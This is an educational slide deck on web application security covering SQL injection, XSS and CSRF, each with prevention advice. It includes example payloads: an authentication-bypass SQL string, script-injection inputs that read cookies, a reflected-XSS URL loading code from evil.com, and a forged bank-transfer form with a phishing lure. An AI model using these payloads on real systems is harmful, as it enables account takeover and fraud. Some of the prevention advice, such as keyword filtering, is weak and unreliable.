www.griddynamics.

com

Trusted engineering partner for digital transformation

Basics of Web Application Security

Grid Dynamics

March 2025
The Basics of Web
Application Security
Common vulnerabilities and best practices for prevention
What is Web Application Security
Web Application Security
Web application security refers to the protective methods used
for web applications. These are processes, strategies, and
security measures designed for their protection.

● The aim is to safeguard the applications from threats and

vulnerabilities.
● These security threats, if not addressed, can lead to severe
consequences like the disruption of functionality, breach
of data integrity, access management, and exposure of
sensitive information.
Importance of Web Application
Security
➢ Protects Data
➢ Ensures Business Continuity through Security
➢ Regulatory Compliance via Robust Web Application
Security
➢ Maintains Trust and Reputation through Secure
Practices
➢ Mitigates the Risk of Cyber Threats
➢ Enhances User Experience by Securing Web
Applications
Common Web Application Security Risks
SQL Injection Attacks
➢ SQL injection, also known as SQLI, is a common attack vector that uses malicious
SQL code for backend database manipulation to access information that was not
intended to be displayed. This information may include any number of items,
including sensitive company data, user lists or private customer details.
● An attacker can use an SQL Injection vulnerability to go around application security
and authenticate as the administrator.
● An attacker could use a trick involving a single quote and set the passwd field to:
● password' OR 1=1

Because of the OR 1=1 statement, the WHERE clause returns the first id from the users table
no matter what the username and password are. The first user id in a database is very often
the administrator. In this way, the attacker not only bypasses authentication but also gains
administrator privileges
Ways to Prevent SQL Injection

● The only sure way to prevent SQL Injection attacks is input validation and
parameterized queries including prepared statements. e.g.,
$username = filter_var($_POST['username'], FILTER_SANITIZE_STRING);

● The application code should never use the input directly. The developer must
sanitize all input, not only web form inputs such as login forms.

● They must remove potential malicious code elements such as single quotes.

● It is also a good idea to turn off the visibility of database errors on your
production sites.
Cross Site Scripting (XSS) Attacks
➢ Cross-site scripting (XSS) is an exploit where the attacker attaches code onto a
legitimate website that will execute when the victim loads the website.
➢ An attacker can use XSS to send a malicious script to an unsuspecting user.
The end user’s browser has no way to know that the script should not be
trusted, and will execute the script.
➢ The malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
Let’s analyze a simple Example: Consider we have a website with a search field.

If the search field is vulnerable, when the user enters any script, then it will be
executed.

<script>alert(‘XSS’)</script>

Then after clicking on the “Search” button, the entered script will be executed
As you can see in the Example, the script typed
into the search field gets executed. However, a
more harmful script may be typed as well.

XSS attacks can also be done without script tag on

any event like onload or onmouseover.

<body onload=alert(‘something’)>;

<b onmouseover=alert(‘XSS testing!‘)></b>

Reflected XSS
This attack occurs when a malicious script is not being saved on the web server but is
reflected in the website’s results.
Consider a social media site that requires users to authenticate to send and view messages.
The website has a search function which displays the search string in the URL, like this:
http://socialize.com?search=latest&news
An attacker notices this and tries the following string as their search:
<script type=’text/javascript’>alert(‘test’);</script>
If the website does not properly sanitize inputs, this test script will appear in the URL, like
this:
http://socialize.com?query=<script type=’text/javascript’>alert(‘test’);</script>
And the script will execute, showing an alert box in the browser. This means the website is
vulnerable to an XSS attack.Now the attacker can craft a URL that executes a malicious script
from their own domain:
http://socialize.com?query=latest&news<\script%20src=”http://evil.com/malicious.js”
Stored XSS
This attack occurs when a malicious script is being saved on the web server permanently.

The malicious script should be sent through the vulnerable input form (For Example, the comment
field or review field). This way the appropriate script will be saved in the database and executed on
the page load or appropriate function calling.

<script>alert(document.cookie)</script>

DOM XSS
This occurs when the DOM environment is being changed, but the code remains the same.

In this Example, a DOM object is being created by the browser, where the document location
object will contain the appropriate string.This way the DOM environment is being affected.
Ways to Prevent XSS

Commonly used main prevention methods include:

● Data validation - Everything that is entered by the user should be precisely

validated, because the user’s input may find its way to the output
● Filtering - search for risky keywords in the user’s input and remove them or
replace them with empty strings
● Escaping - appropriate characters are being changed by special codes. For
Example, < escaped character may look like &#60.
Cross Site Request Forgery(CSRF) Attacks
➢ Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they’re currently authenticated.
○ Attacker send a link via email to users of a web application into executing
actions of the attacker’s choosing.
○ A successful CSRF attack can force the user to perform state changing requests
like transferring funds, changing their email address, and so forth.
CSRF Attack Examples

Forged GET request

The original request :
GET http://bank.com/transfer.do?acct=BOB&amount=100 HTTP/1.1
The attacker’s forged request,as attacker changes the account number to their own account and
increases the transfer amount to 100,000:
http://bank.com/transfer.do?acct=MARIA&amount=100000
Now the attacker needs to trick the victim into visiting this forged URL while signed into the
banking application. The attacker might draft an email like this:

To: Victim
Subject: A gift of flowers for you!

Hello victim,
We know your birthday is coming up and have a special gift for you. Just click here to receive it!

The link “click here” would lead to the forged URL shown above.
CSRF Attack Examples

Forged POST request

If the banking application uses POST requests, the user’s original operation would look like this:

POST http://acmebank.com/fundtransfer HTTP/1.1

acct=344344&amount=5000

In this case, the attacker would need to craft a <form> element with the forged request:

<form action="http://acmebank.com/fundtransfer" method="POST">

224224"/>
<input type="hidden" name="acct" value="
50000"/>
<input type="hidden" name="amount" value="
<input type="submit" value="Click to get your free gift!"/>
</form>

When the user submits the form, then illicit transfer will carried out
Preventing CSRF Attacks

● Use Anti CSRF -

tokens
● Same Site Cookies
Attribute
● Avoiding GET request
from state Changes
Conclusion
Securing web applications is a complex task that requires a proactive and comprehensive approach.

By implementing robust security measures such as input validation, strong authentication protocols,
secure data transmission, and regular software updates, organizations can significantly reduce the
risk of cyber threats.

Embracing these practices not only protects sensitive data but also fosters trust with users and
stakeholders.
 trusted engineering partner for digital transformation

Thank you!
Q&A